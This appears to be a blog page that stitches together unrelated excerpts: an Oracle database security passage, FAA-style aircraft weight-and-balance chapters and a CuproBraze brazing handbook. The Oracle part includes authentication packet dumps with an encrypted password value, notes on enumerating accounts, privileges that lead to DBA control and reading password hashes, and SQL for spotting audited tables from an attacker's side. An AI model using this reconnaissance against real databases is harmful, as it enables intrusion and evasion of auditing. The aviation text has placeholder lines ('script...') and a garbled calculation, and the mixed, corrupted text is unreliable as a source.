45 38 45 00 00 00 00 04 01 00 00 00 00 00 00 00  (E8E             )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00  (                )
00 00 00 00 00 00 00                             (       )

Note that if the user does not exist on the remote server, no session key is issued. This is useful for an attacker. He or she can work out whether or not a given account exists on the server. (See the "Oracle Auditing" section at the end of this chapter to catch attacks like this.) Anyway, assuming the user does exist, the session key is sent back to the client. The client uses this session key to encrypt its password and send it back to the server for validation.

03 26 00 00 06 00 00 00 00 00 03 73 03 e0 91 d3  ( &         s    )
00 06 00 00 00 01 01 00 00 e8 b1 12 00 07 00 00  (                )
00 a0 ae 12 00 2c b4 12 00 06 73 79 73 74 65 6d  (     ,    system)
0d 00 00 00 0d 41 55 54 48 5f 50 41 53 53 57 4f  (     AUTH_PASSWO)
52 44 20 00 00 00 20 36 37 41 41 42 30 37 46 38  (RD     67AAB07F8)
45 32 41 32 46 33 42 45 44 41 45 43 32 33 31 42  (E2A2F3BEDAEC231B)
36 42 32 41 30 35 30 00 00 00 00 0d 00 00 00 0d  (6B2A050         )

Once authenticated to the database server, a user's actions are controlled using authorization. In Oracle, authorization is dictated by system and object privileges.

Authorization

System privileges define what a user can do to the database, whereas object privileges define what a user can do to database objects such as tables and procedures. For example, there's a system privilege that, if granted, allows a user to create procedures and once created, object privileges can be granted that allow another user to execute it. There are 173 system privileges in Oracle 10g—these can be listed with the following query:

SQL> select distinct name from sys.system_privilege_map;

As far as object privileges go there are far fewer defined—23:

SQL> select distinct name from sys.table_privilege_map;

Key System Privileges

There are a few system privileges, which if granted, can be abused to gain complete control of the database server. Let's look at a few.

EXECUTE ANY PROCEDURE

This gives the grantee the ability to run any procedure on the server. We'll talk more about procedures later on but suffice to say this is one of the most powerful system privileges. If granted, the user can become a DBA in the blink of an eye.

SELECT ANY DICTIONARY

Any data in the database that is integral to the operation of the database are stored in a bunch of tables collectively known as the Oracle Data Dictionary. These tables are stored in the SYS schema. If users have the SELECT ANY DICTIONARY privilege it means that they can select from any of these tables. For example they could select password hashes from the SYS.USER$ table. The DBSNMP account is a good case study for this—it's not a DBA but it does have this system privilege. It's an easy task for DBSNMP to get DBA privileges due to this.

GRANT ANY PRIVILEGE / ROLE / OBJECT PRIVILEGE

Any of these, if granted, can allow a user to gain control of the system. They do as their names imply.

CREATE LIBRARY

If users have the CREATE LIBRARY, or any of the other library privileges, then they have the ability to run arbitrary code through external procedures.

Oracle Auditing

This section discusses Oracle auditing—auditing in the sense of tracking what users are doing and when. Unless you check whether auditing is on or not, you're never going to know whether "big brother" is watching—if you're attacking the system at least. If you're defending a system, then auditing should be on—but not necessarily for everything. For a busy database server if every action is audited, the audit trail can become massive. At a minimum, failed and successful log on attempts should be audited as well as access to the audit trail itself.

Oracle can either log to the file system or to a database table and this is controlled with an entry in the init.ora file. To log audit information to the database, add an entry like

audit_trail = db

To log audit information to the file system, change the "db" to "os". If audit_trail is set to "none," then no auditing is performed. If logging occurs in the database, then events are written to the SYS.AUD$ table in the data dictionary. This table stands out from others in the dictionary because rows can be deleted from it. This has significance to the validity or accuracy of the log if access to the SYS.AUD$ is not restricted, and audited.

Once auditing is enabled you need to configure what actions, events, and so on should be audited. For a full list of what can be logged refer to the Oracle documentation, but here I'll show how to turn on auditing for failed and successful log in attempts and how to protect the AUD$ table itself.

Log on to the system with DBA privileges, or at least an account that has either the AUDIT ANY or AUDIT SYSTEM privilege and issue the following statement:

AUDIT INSERT, UPDATE, DELETE ON SYS.AUD$ BY ACCESS;

This protects access to the audit trail so if someone attempts to manipulate it, the access itself will be logged. Once done, then issue

    AUDIT CREATE SESSION;

This will turn on logging for log on attempts.

When attacking a system it is often useful to know what actions and so on are being audited because this will usually point you toward the "valuable" information. For example, all access to the HR.WAGES table might be audited. To see a list of what tables are audited, run the following query:

SELECT O.NAME FROM SYS.OBJ$ O, SYS.TAB$ T 
WHERE T.AUDIT$ LIKE '%A%' 
AND O.OBJ#=T.OBJ#

What's happening here? Well, the SYS.TAB$ table contains a column called AUDIT$. This column is a varchar(38) with each varchar being a dash or an A:

    ------AA----AA------AA----------

Depending upon where an A or a dash occurs defines what action is audited, whether it be a SELECT, UPDATE, INSERT, and so on.

If execute is audited for a procedure, this can be checked by running

SELECT O.NAME FROM SYS.OBJ$ O, SYS.PROCEDURE$ P 
WHERE P.AUDIT$ LIKE '%S%' 
AND O.OBJ# = P.OBJ#

Download the book.

Aircraft Design Weight and Balance Handbook Ch. 2a

Weight and Balance Theory

Two elements are vital in the weight and balance considerations of an aircraft:

The total weight of the aircraft must be no greater than the maximum gross weight allowed by the FAA for the particular make and model of the aircraft.
The center of gravity, or the point at which all of the weight of the aircraft is considered to be concentrated, must be maintained within the allowable range for the operational weight of the aircraft.

Aircraft Arms, Weights, and Moments

The term arm, usually measured in inches, refers to the distance between the center of gravity of an item or object and the reference datum. Arms ahead of, or to the left of the datum are negative (–), and those behind, or to the right of the datum are positive (+). When the datum is ahead of the aircraft, all of the arms are positive and computational errors are minimized.

Weight is normally measured in pounds. When weight is removed from an aircraft, it is negative (–), and when added, it is positive (+).

There are a number of weights that must be considered in aircraft weight and balance. The following are terms for various weights as used by the General Aviation Manufacturers Association (GAMA).

The standard empty weight is the weight of the airframe, engines and all items of operating weight that have fixed locations and are permanently installed in the aircraft. This weight must be recorded in the aircraft weight and balance records. The basic empty weight includes the standard empty weight plus any optional equipment that has been installed.
Maximum allowable gross weight is the maximum weight authorized for the aircraft and all of its contents as specified in the Type Certificate Data Sheets (TCDS) or Aircraft Specifications for the aircraft.
Maximum landing weight is the greatest weight that an aircraft normally is allowed to have when it lands.
Maximum takeoff weight is the maximum allowable weight at the start of the takeoff run.
Maximum ramp weight is the total weight of a loaded aircraft, and includes all fuel. It is greater than the takeoff weight due to the fuel that will be burned during the taxi and run up operations. Ramp weight is also called taxi weight.

The manufacturer establishes the allowable gross weight and the range allowed for the CG, as measured in inches from a reference plane called the datum. In large aircraft, this range is measured in percentage of the mean aerodynamic chord (MAC), the leading edge of which is located a specified distance from the datum.
The datum may be located anywhere the manufacturer chooses; it is often the leading edge of the wing or some specific distance from an easily identified location. One popular location for the datum is a specified distance forward of the aircraft, measured in inches from some point such as the leading edge of the wing or the engine firewall.

The datum of some helicopters is the center of the rotor mast, but this location causes some arms to be positive and others negative. To simplify weight and balance computations, most modern helicopters, like airplanes, have the datum located at the nose of the aircraft or a specified distance ahead of it.
A moment is a force that tries to cause rotation, and is the product of the arm, in inches, and the weight, in pounds. Moments are generally expressed in pound-inches (lb-in) and may be either positive or negative. Figure 2-1 shows the way the algebraic sign of a moment is derived. Positive moments cause an airplane to nose up, while negative moments cause it to nose down.
figure 2-1

The Law of the Lever

All weight and balance problems are based on the physical law of the lever. This law states that a lever is balanced when the weight on one side of the fulcrum multiplied by its arm is equal to the weight on the opposite side multiplied by its arm. In other words, the lever is balanced when the algebraic sum of the moments about the fulcrum is zero. [Figure 2-2] This is the condition in which the positive moments (those that try to rotate the lever clockwise) are equal to the negative moments (those that try to rotate it counter- clockwise).

figure 2-2

Consider these facts about the lever in Figure 2-2: The 100-pound weight A is located 50 inches to the left of the fulcrum (the datum, in this instance), and it has a moment of 100°?–50 = –5,000 lb-in. The 200-pound weight B is located 25 inches to the right of the fulcrum, and its moment is 200° +25 = +5,000 lb-in. The sum of the moments is –5,000 +5,000 = 0, and the lever is balanced. [Figure 2-3] The forces that try to rotate it clockwise have the same magnitude as those that try to rotate it counterclockwise.
figure 2-3

Determining the CG
One of the easiest ways to understand weight and balance is to consider a board with weights placed at various locations. We can determine the CG of the board and observe the way the CG changes as the weights are moved. The CG of a board like the one in Figure 2-4 may be deter-mined by using these four steps:

Measure the arm of each weight in inches from a datum.
Multiply each arm by its weight in pounds to determine the moment in pound-inches of each weight.
Determine the total of all the weights and of all the moments. Disregard the weight of the board.
Divide the total moment by the total weight to determine the CG in inches from the datum.

figure 2-4

In Figure 2-4, the board has three weights, and the datum is located 50 inches to the left of the CG of weight A. Determine the CG by making a chart like the one in Figure 2-5.

figure 2-5

As noted in Figure 2-5, “A” weighs 100 pounds and is 50 inches from the datum; “B” weighs 100 pounds and is 90 inches from the datum; “C” weighs 200 pounds and is 150 inches from the datum. Thus the total of the three weights is 400 pounds, and the total moment is 44,000 lb-in. Determine the CG by dividing the total moment by the total weight.

script...

To prove this is the correct CG, move the datum to a location 110 inches to the right of the original datum and determine the arm of each weight from this new datum, as in Figure 2-6. Then make a new chart similar to the one in Figure 2- 7. If the CG is correct, the sum of the moments will be zero.

figure 2-6

The new arm of weight A is 110 – 50 = 60 inches, and since this weight is to the left of the datum, its arm is negative, or –60 inches. The new arm of weight B is 110 – 90 = 20 inches, and it is also to the left of the datum, so it is –20; the new arm of weight C is 150 – 110 = 40 inches. It is to the right of the datum and is therefore positive.

figure 2-7

The location of the datum used for determining the arms of the weights is not important; it can be anywhere. But all of the measurements must be made from the same datum location.

Determining the CG of an airplane is done in the same way as determining the CG of the board in the example on the previous page. [Figure 2-8] Prepare the airplane for weighing (as explained in Chapter 3) and place it on three scales. All tare weight, the weight of any chocks or devices used to hold the aircraft on the scales, is subtracted from the scale reading, and the net weight of the wheels is entered into a chart like the one in Figure 2-9. The arms of the weighing points are specified in the TCDS for the airplane in terms of stations, which are distances in inches from the datum.

figure 2-8 figure 2-9

The empty weight of this aircraft is 5,862 pounds. Its EWCG, determined by dividing the total moment by the total weight, is located at fuselage station 201.1. This is 201.1 inches behind the datum.
script 2...

Aircraft Design Weight and Balance Handbook Ch. 1b

Weight Changes

The maximum allowable gross weight for an aircraft is determined by design considerations. However, the maximum operational weight may be less than the maximum allowable due to such considerations as high density altitude or high-drag field conditions caused by wet grass or water on the runway. The maximum gross weight may also be limited by the departure or arrival airport’s runway length.
One important preflight consideration is the distribution of the load in the aircraft. Loading an aircraft so the gross weight is less than the maximum allowable is not enough. This weight must be distributed to keep the CG within the limits specified in the POH or AFM.
If the CG is too far forward, a heavy passenger can be moved to one of the rear seats or baggage can be shifted from a forward baggage compartment to a rear compartment. If the CG is too far aft, passenger weight or baggage can be shifted forward. The fuel load should be balanced laterally: the pilot should pay special attention to the POH or AFM regarding the operation of the fuel system, in order to keep the aircraft balanced in flight.

Weight and balance of a helicopter is far more critical than for an airplane. A helicopter may be properly loaded for takeoff, but near the end of a long flight when the fuel tanks are almost empty, the CG may have shifted enough for the helicopter to be out of balance laterally or longitudinally. Before making any long flight, the CG with the fuel available for landing must be checked to ensure it will be within the allowable range.
Airplanes with tandem seating normally have a limitation requiring solo flight to be made from the front seat in some airplanes or the rear seat in others. Some of the smaller helicopters also require solo flight be made from a specific seat, either the right or the left. These seating limitations will be noted by a placard, usually on the instrument panel, and they should be strictly adhered to.

As an aircraft ages, its weight usually increases due to trash and dirt collecting in hard-to-reach locations, and moisture absorbed in the cabin insulation. This growth in weight is normally small, but it can only be determined by accurately weighing the aircraft.

Changes of fixed equipment may have a major effect upon the weight of the aircraft. Many aircraft are overloaded by the installation of extra radios or instruments. Fortunately, the replacement of older, heavy electronic equipment with newer, lighter types results in a weight reduction. This weight change, however helpful, will probably cause the CG to shift and this must be computed and annotated in the weight and balance data.

Repairs and alterations are the major sources of weight changes, and it is the responsibility of the AMT making any repair or alteration to know the weight and location of these changes, and to compute the new CG and record the new empty weight and EWCG in the aircraft weight and balance data.
The AMT conducting an annual or 100-hour inspection must ensure the weight and balance data in the aircraft records is current and accurate. It is the responsibility of the pilot in command to use the most current weight and balance data when operating the aircraft.

Has the Aircraft Gained Weight?
As an aircraft ages, its weight usually increases. Repairs and alterations are the major sources of weight change.
AMTs conducting an annual or 100-hour inspection must ensure the weight and balance data in the aircraft records is current and accurate. The pilot in command’s responsibility is to use the most current weight and balance data when planning a flight.

Stability and Balance Control

Balance control refers to the location of the CG of an aircraft. This is of primary importance to aircraft stability, which determines safety in flight. The CG is the point at which the total weight of the aircraft is assumed to be concentrated, and the CG must be located within specific limits for safe flight. Both lateral and longitudinal balance are important, but the prime concern is longitudinal balance; that is, the location of the CG along the longitudinal or lengthwise axis.

An airplane is designed to have stability that allows it to be trimmed so it will maintain straight and level flight with hands off of the controls. Longitudinal stability is maintained by ensuring the CG is slightly ahead of the center of lift. This produces a fixed nose-down force independent of the airspeed. This is balanced by a variable nose-up force, which is produced by a downward aerodynamic force on the horizontal tail surfaces that varies directly with airspeed.

[Figure 1-1]

If a rising air current should cause the nose to pitch up, the airplane will slow down and the downward force on the tail will decrease. The weight concentrated at the CG will pull the nose back down. If the nose should drop in flight, the airspeed will increase and the increased downward tail load will bring the nose back up to level flight.

As long as the CG is maintained within the allowable limits for its weight, the airplane will have adequate longitudinal stability and control. If the CG is too far aft, it will be too near the center of lift and the airplane will be unstable, and difficult to recover from a stall. [Figure 1-2] If the unstable airplane should ever enter a spin, the spin could become flat and recovery would be difficult or impossible.

[figure 1-2]

If the CG is too far forward, the downward tail load will have to be increased to maintain level flight. This increased tail load has the same effect as carrying additional weight — the aircraft will have to fly at a higher angle of attack, and drag will increase.

A more serious problem caused by the CG being too far forward is the lack of sufficient elevator authority. At slow takeoff speeds, the elevator might not produce enough nose- up force to rotate and on landing there may not be enough elevator force to flare the airplane. [Figure 1-3] Both takeoff and landing runs will be lengthened if the CG is too far forward.

figure 1-3

The efficiency of some modern high-performance military fighter airplanes is increased by giving them neutral longitudinal stability. This is normally a very dangerous situation; but these aircraft are flown by autopilots which react far faster than a human pilot, and they are safe for their special operations.

The basic aircraft design assumes that lateral symmetry exists. For each item of weight added to the left of the centerline of the aircraft (also known as buttock line zero, or BL-0), there is generally an equal weight at a corresponding location on the right.

The lateral balance can be upset by uneven fuel loading or burnoff. The position of the lateral CG is not normally computed for an airplane, but the pilot must be aware of the adverse effects that will result from a laterally unbalanced condition. [Figure 1-4] This is corrected by using the aileron trim tab until enough fuel has been used from the tank on the heavy side to balance the airplane. The deflected trim tab deflects the aileron to produce additional lift on the heavy side, but it also produces additional drag, and the airplane flies inefficiently.

figure 1-4

Helicopters are affected by lateral imbalance more than airplanes. If a helicopter is loaded with heavy occupants and fuel on the same side, it could be enough out of balance to make it unsafe to fly. It is also possible that if external loads are carried in such a position to require large lateral displacement of the cyclic control to maintain level flight, the fore-and-aft cyclic control effectiveness will be limited.

Sweptwing airplanes are more critical due to fuel imbalance because as the fuel is used from the outboard tanks the CG shifts forward, and as it is used from the inboard tanks the CG shifts aft. [Figure 1-5] For this reason, fuel-use scheduling in high-speed jet aircraft operation is critical.

figure 1-5

Aircraft can perform safely and achieve their designed efficiency only when they are operated and maintained in the way their designers intended. This safety and efficiency is determined to a large degree by holding the aircraft’s weight and balance parameters within the limits specified for its design. The remainder of this book describes the way in which this is done.

Aircraft Design Weight and Balance Handbook Ch. 1a

Why is Weight and Balance Important?

Weight and balance is one of the most important factors affecting safety of flight. An overweight aircraft, or one whose center of gravity is outside the allowable limits, is inefficient and dangerous to fly. The responsibility for proper weight and balance control begins with the engineers and designers and extends to the pilot who operates and the Aviation Maintenance Technician (AMT) who maintains the aircraft.
Modern aircraft are engineered utilizing state-of-the-art technology and materials to lift the maximum amount of weight and carry it the greatest distance at the highest speed. As much care and expertise must be exercised in operating and maintaining these efficient aircraft as was taken in their design and manufacturing.
Various types of aircraft have different load requirements. Transport aircraft must carry huge loads of passengers and cargo for long distances at high altitude and high speed. Military aircraft must be highly maneuverable and extremely sturdy. Corporate aircraft must carry a reasonable load at a high speed for long distances. Agricultural aircraft must carry large loads short distances and be extremely maneuverable. Trainers and private aircraft must be lightweight, low cost, simple, and safe to operate. All aircraft regardless of their function have two characteristics in common: all are sensitive to weight, and the center of gravity of the aircraft must be maintained within a specified range.

The designers of an aircraft have determined the maximum weight, based on the amount of lift the wings or rotors can provide under the operating conditions for which the aircraft is designed. The structural strength of the aircraft also limits the maximum weight the aircraft can safely carry. The ideal location of the center of gravity (CG) was very carefully determined by the designers, and the maximum deviation allowed from this specific location has been calculated. The manufacturer provides the aircraft operator with the empty weight of the aircraft and the location of its empty- weight center of gravity (EWCG) at the time the aircraft left the factory. The AMT who maintains the aircraft and performs the maintenance inspections keeps the weight and balance records current, recording any changes that have been made because of repairs or alterations.
The pilot in command of the aircraft has the responsibility on every flight to know the maximum allowable gross weight of the aircraft and its CG limits. This allows the pilot to determine on the preflight inspection that the aircraft is loaded in such a way that the CG is within the allowable limits.

Weight and balance technology, like all other aspects of aviation, has become more complex as the efficiency and capability of aircraft and engines have increased. Therefore, this requires all pilots and AMTs to understand weight and balance control, and to operate and maintain their aircraft so its weight and CG location are within the limitations established when the aircraft was designed, manufactured, and certified by the FAA.

Weight Control

Weight is a major factor in airplane construction and operation, and it demands respect from all pilots and particular diligence by all AMTs. Excessive weight reduces the efficiency of an aircraft and the safety margin available if an emergency condition should arise.

When an aircraft is designed, it is made as light as the required structural strength will allow, and the wings or rotors are designed to support the maximum allowable gross weight. When the weight of an aircraft is increased, the wings or rotors must produce additional lift and the structure must support not only the additional static loads , but also the dynamic loads imposed by flight maneuvers. For example, the wings of a 3,000-pound airplane must support 3,000 pounds in level flight, but when the airplane is turned smoothly and sharply using a bank angle of 60°, the dynamic load requires the wings to support twice this, or 6,000 pounds.

Severe uncoordinated maneuvers or flight into turbulence can impose dynamic loads on the structure great enough to cause failure. The structure of a normal category airplane must be strong enough to sustain a load factor of 3.8 times its weight; that is, every pound of weight added to an aircraft requires that the structure be strong enough to support an additional 3.8 pounds. An aircraft operating in the utility category must sustain a load factor of 4.4, and acrobatic category aircraft must be strong enough to withstand 6.0 times their weight.

The lift produced by a wing is determined by its airfoil shape, angle of attack, speed through the air, and the air density. When an aircraft takes off from an airport with a high density altitude, it must accelerate to a speed faster than would be required at sea level to produce enough lift to allow takeoff; therefore, a longer takeoff run is necessary. The distance needed may be longer than the available runway. When operating from a high density altitude airport, the Pilot’s Operating Handbook (POH) or Airplane Flight Manual (AFM) must be consulted to determine the maximum weight allowed for the aircraft under the conditions of altitude, temperature, wind, and runway conditions.

Effects of Weight

Most modern aircraft are so designed that if all seats are occupied, all baggage allowed by the baggage compartment structure is carried, and all of the fuel tanks are full, the aircraft will be grossly overloaded. This type of design gives the pilot a great deal of latitude in loading the aircraft for a particular flight. If maximum range is required, occupants or baggage must be left behind, or if the maximum load must be carried, the range, dictated by the amount of fuel on board, must be reduced.

The aircraft will need a higher takeoff speed, which results in a longer takeoff run.
Both the rate and angle of climb will be reduced.
The service ceiling will be lowered.
The cruising speed will be reduced.
The cruising range will be shortened.
Maneuverability will be decreased.
A longer landing roll will be required because the landing speed will be higher.
Excessive loads will be imposed on the structure, especially the landing gear.

The POH or AFM includes tables or charts that give the pilot an indication of the performance expected for any gross weight. An important part of careful preflight planning includes a check of these charts to determine the aircraft is loaded so the proposed flight can be safely made.

High Density Altitude Airport Operations
Consult the POH or AFM to determine the maximum weight allowed for the aircraft under the conditions of altitude, temperature, wind, and runway conditions.
Your preflight planning must include a careful check of gross weight performance charts to determine the aircraft is loaded properly and the proposed flight can be safely made.

Thursday, December 15, 2011

Brazing Handbook - Fabrication and assembly of components

Fabrication and assembly of components

All furnace brazing operations, among them CuproBraze, require narrow tolerances. Generally, closer tolerances and well-defined joint gaps result in better and stronger joints, see figure 19.

Figure 19. Diagram showing filling length in gap with different
clearance.

Another factor to take into account is that the brazing alloy is in powder form and it builds up a thicker layer than a solid metal. The geometry of the tubes and fins and the tube pitch in the header should be adjusted accordingly.

Tube fabrication

Several types of brass tubes can be used to manufacture CuproBraze heat exchangers. These tubes are uniformly made from strip because thin gauges are required for lightness and efficient heat exchange. Tube fabrication requires that the edges of the strip are reliably bonded together. The tube seams can be sealed during the brazing process or they can be welded prior to the brazing process.
Tubes for use in the CuproBraze process should be specified with a crown that is higher compared to the crowns of tubes for use in a soldering process. The crown (see Figure 20) should be 0.4mm to 0.8mm for tube widths 12mm to 25mm. A higher crown results in a more consistent bond between tube and fin, see chapter 11.

Figure 20. Definition of the crown on the tube. Crown is W₂ – W₁.

Important : Tubes for use in the CuproBraze process should be specified with a crown that is higher compared to the crowns of tubes for use in a soldering process.

HF-welded tubes

High frequency (HF) welded tubes are most commonly used today for CuproBraze heat exchangers because their contoured shape is uninterrupted around the circumference of the tube. As a result, a consistent gap can be achieved between the tube and the header. HF-welded tubes are commercially available. When welding tubes of brass strip for CuproBraze, note the differences in the material performance as described in part 2.2. as this can effect the settings of the welding parameters. When bare CuproBraze tubes are produced, careful rinsing and drying are needed to avoid discoloration.

Important: Note the differences between normal and CuproBraze tube materials when HF-welding

Folded tubes

Folded tubes can be made of thinner brass strips (gauges down to about 0.080 mm). In the solder process the most common folded tube uses the lock-seam fold. This type of tube can also be used for the CuproBraze process but new tube designs offer advantages over the lock-seam design. The folded design (called snap-over) and B-fold design are just two types of tubes being tested for CuproBraze heat exchangers. Spraying of paste on the surfaces of the tubes does not result in a leak-tight seal at the seams. Folding methods include injecting the overlapping parts with a bead of brazing paste in the tube mill. Paste injection has to be performed correctly for optimal brazing results. To get optimal fatigue properties of the tubes, the paste injection should secure complete joints on the water side of the tubes. Figure 21 shows cross section of one type of folded tube.

Figure 21. Cross section of one type of folded tube after forming.

Fins

Consistency in the fin amplitude is also important. Inconsistency in the fin height can result in a gap that is too large between fin tip and tube, and a low percentage of correctly brazed tube-to-fin bonds. Also unnecessary amounts of brazing paste on the tubes will be used. Variations from fin-tip to fin-tip should be at an absolute minimum.

Headers

The holes in the header can be designed and manufactured in different ways. (See Figure 22.) For the CuproBraze process, pierced holes are recommended using a two-stage operation, which creates a continuous collar of contact surface area between the header and the subsequently inserted tube. This shape draws braze alloy from the surface of the header into the joint by capillary action. The optimum capillary action is reached at 0.05 mm joint clearance which means that the optimal size for the gap between header and tube is 0.05mm and this gap should not exceed 0.1mm. No tears are allowed in the joint section.
Stiffening ribs on the header are also beneficial (See Figure 23). Besides functioning as reinforcement, ribs lower the slurry consumption. Paste flowing into the wells around the tubes is not wasted on areas between tubes. When header gauges are smaller than 0.8mm (0.03in), extra care is recommended with tabbed header design from the strength point.
The type of oil used in the stamping process normally leaves unwanted residues after brazing, this negatively influences the brazing of the tube-header joints.

Important : If the stamping oil gives this problem, which can be seen as dark surface of the header after brazing, the headers have to be degreased before assembling.

Figure 22. Pierced holes (left and middle) in header are
recommended. Lanced holes (right) are used for soldering but are
not recommended for brazing.

Figure 23. Stiffening ribs on header.

Important : Optimal size for the gap between header and tube is 0.05mm, this gap should not exceed 0.1mm.

Surface conditions

At the brazing temperature, the surfaces of the components to be joined, as well as the brazing powder must be free from any non-metallic films, such as organic residues and metal oxides. In the brazing process, there is nothing, which can remove any dirt, heavy oils and oxides. To be able to wet and alloy with the components, they have to be clean before brazing. All storing of the components must be done in such a way that no contamination of any dust, chemicals and oxides take place, especially the paste coated parts that are very sensitive.
Most types of oils on copper and brass surfaces will form black or even invisible organic residues after heating in nitrogen atmosphere. The residues will be very thin films, which sometimes can be difficult to remove. Oils with low boiling point do not normally form this kind of organic residues.

Important :The oil on the surfaces after fin and tube production, are normally not harmful.

Brazing fixtures and assemblies

As previously mentioned, the brazing powder builds up a thicker layer than a solid metal of the same weight. This extra thickness must be taken into account when specifying tube pitch in headers and brazing-fixture devices.
The tube pitch (see figure 24) in the headers is a function of the tube width and fin amplitude with an allowance for a brazing paste layer. The allowance for brazing paste in turn depends on the tube dimension, the core width and the fin design. The brazing paste allowance has to be determined with actual components. As a guideline, increasing the pitch by 0.10mm often works well, resulting in a complete brazed joint between fin and tube. But for optimal brazing result, it is recommended to check the brazing result between the tubes and the fins for the first sample before further work. Figure 25 illustrates the shape changes of the tubes during compression of the core. See also figures 20 and 23.
The virgin tube has a convex belly, when the tube is compressed it starts flattering. If it is compressed too much, the tube walls will be bent inwards in the centre and become concave.

Figure 24. Definition of the tube pitch.

Figure 25. The figure illustrates what happens to the tubes during
compression of the core. The virgin tube (A) is convex, when the core
is compressed to right dimension the tube sides are flat (B). If the
core is compressed too much, the tube is formed like a “dog-bone”
(C).

In the CuproBraze process the parts go through a temperature-cycle from room temperature up to 650ºC, which means that the differences in the thermal expansion will influence the fixture design. Table 8 shows the thermal expansion coefficient and the expansion for 1 meter of the material from 25 ºC to 650 ºC.

Table 8. The heat expansion and the increase in length (∆l ) from
25ºC to 650ºC for 1m long object.

The assembly and brazing-fixture system should allow for the convex shape of the core before brazing, due to build-up of brazing paste and the heat expansion of the fixture. For a 500mm x 500mm core, a typical dimension measured in the middle of the core is 502.5mm to 503mm.
Another requirement of the brazing fixture is the demand for a reduced mass that allows the fixture to follow the temperature of the radiator core as closely as possible. This arrangement prevents differences in dimensions due to temperature variations that could lead to permanent deformation of fins or tubes. For the same reason, the fixture material should have a thermal expansion coefficient as close as possible to that of brass, favouring stainless steel instead of plain steel.
A slight flexibility in the fixture (to allow it to follow the core when the brazing paste melts) is also recommended, especially for larger cores.
Due to the differences of the heat expansion for header brass and the steel in the fixtures, especially careful work has to be done when designing the fixtures in the corner area of the cores. Figure 26 shows schematically what happens in this area during brazing.

Figure 26. Principles for the influence of the heat expansion in the
corner of the core. At room temperatures (left) and at brazing
temperatures (right).

In figure 26, lh is the distance between the outer tubes and lw is the length of the steel fixture. At brazing temperature, the steel fixture is shorter than the distance between the outer tubes. If the steel part is too short from the beginning or the fixture is placed too close to the header, the outer tubes will be crushed and leakage in the tube- header in the corner area will appear.
It is preferable to design with side supports that are mechanically attached to the header prior to brazing. These supports provide a well-defined gap during the entire brazing cycle for the outermost fins that are close to the header. In this manner, brazing voids or deformation of the fin or tube in the corner region can be avoided.

Brazing Handbook - Paste Application

Paste application

Brazing pastes are used to form joints between the tubes and the fins as well as to join the tubes to the header. Tank to header and other kinds of joints can also be brazed
For tube-to-fin joints, brazing paste can be applied either on the tube surfaces or on the fin tips, see figure 12
figure 12
A layer of paste can be applied on the surfaces of the heat exchanger parts by many different methods, such as spraying, dipping, roll coating etc.
Except for the thermoplastic pastes, the pastes have to be dried, normally with warm air. Good temperature control during heating and drying is needed to prevent overheating and subsequently poor brazing results. The brazing properties of the pastes can be destroyed above 130ºC. Instructions from paste suppliers must be followed. Most of the brazing pastes involve some kind of solvent, which can form effluents during drying. Contact the paste-manufacturer for more information.

Important: Do not overheat the paste during drying.

Paste on tubes-Spraying

The method most commonly used today is spraying with commercial spray guns. As an example, tube coating, manually as well as automatic spraying is illustrated in figures 13 and 14. Due to the drying time for the paste, it is so far not possible to have the spray coating in line with the tube welding equipment. By turning the tubes 90º, it is possible to match the coating speed with the welding speed.
As pastes from different manufacturers can have different spraying properties as well as drying time, the settings of the applying parameters sometimes have to be changed. The coating is not a homogenous brazing metal, instead it is formed with particles and binder and after drying can also be porous, which means that the coating thickness for a certain weight could differfrom spraying methods as well as type of paste. Therefore the amount of brazing metal should be measured as weight/area.
Coatings should be evenly applied with a coating weight of 150-250 g/m2 after drying, formula 1 shows a calculation of the amount of paste on tubes related to these values. Table 6 shows these amounts of paste related to some tube dimensions. The better the tolerances of the tubes and fins, the thinner the layer can be. It is recommended to start with the thickest (heaviest) coating.

A = L x 2(H + W)x P [1]

Where
A: the amount of dried paste on the tube
L: the length of the tube
H: the height of the tube
W: the width of the tube
P: the preferred amount of paste/m2
tabel 6
Pastes which have a high metal content and which leave a smooth surface after drying are preferred.
It is recommended not to coat the tube ends. If the tube ends are coated it can sometimes have a negative influence on the joint quality of the tube-header joints.
figur 13 figur 14
Depending on the storage area atmosphere, the coated tubes can be stored for days up to several months. The storage should be clean and with no contamination of the coating.
This coating method consumes more paste than needed for the tubes (over-spraying). Work is going on to minimize this amount.

Development of tube coating methods

Work is going on to develop not only the paste spraying but also other coating processes, e.g. thermal spray. The new developments will probably be commercially available during 2007, with options for coating online tube-mill or offline, whichever is preferred.

Important : The amount of filler metal for all tube coating methods shall always fulfill the amounts shown in table 6.

Paste on fin tips

Consumption of brazing paste could in most cases, depending of the fin density, be lowered by applying the paste on the tips of the fins rather than on the tubes. Thermoplastic pastes, as well as some solvent-based pastes, are suitable for fin-tip application. The coating thickness is measured by weighing; the recommended amount of paste on each tip is 0.3 mg/mm to 0.5 mg/mm of fin width. Again, the better the fit between fin and tube the smaller the amount of paste application on the tips. Table 7 shows some examples of amount of paste for some fin widths and density. In the table fpi is the number of fin tips per inch.
The fin tips are coated by contact with paste coated rolls. When using thermoplastic paste, the fins pass through a pair of rollers and are coated in one step. This principle is shown in figures 15 and 16. When using solvent-based pastes, the tips of the fins are coated on one side at a time with drying between.
Depending of the storage atmosphere, the coated fins can be stored for days up to several months. For all types of storages, it should be clean and with no contamination of the coating.
tabel 7 figure 15 figure 16

Tube-to-header joints

A dedicated paste (sometimes called slurry) is recommended for tube-to-header joints. This paste has a lower viscosity than the pastes for tube or fin-tip coating and can be applied by pouring or spraying. Normally the paste is applied on the airside of the header. The volume of the paste is around double the volume of the filler metal in the joints after brazing. The visible amount of paste should therefore be more than what the joints are expected to be after brazing. The amount of paste required is typically 0.5 g (dry weight) per tube end for 16mm wide tubes and 1.8 g per tube end for 60x6mm tubes. These quantities are just guidelines, as the amount of paste is influenced by the geometry of the joint. Formula 2 shows guideline for calculating the amount of paste for other tube dimensions.

E = (H + W)/36 [2]

Where
E is the amount of dried paste on the tube end
H is the height of the tube
W is the width of the tube
And for a total amount on a header

N x (H + W)/36

where N is the quantity of tubes in the header
For multi row cores it is important that the paste is evenly distributed at all joints.
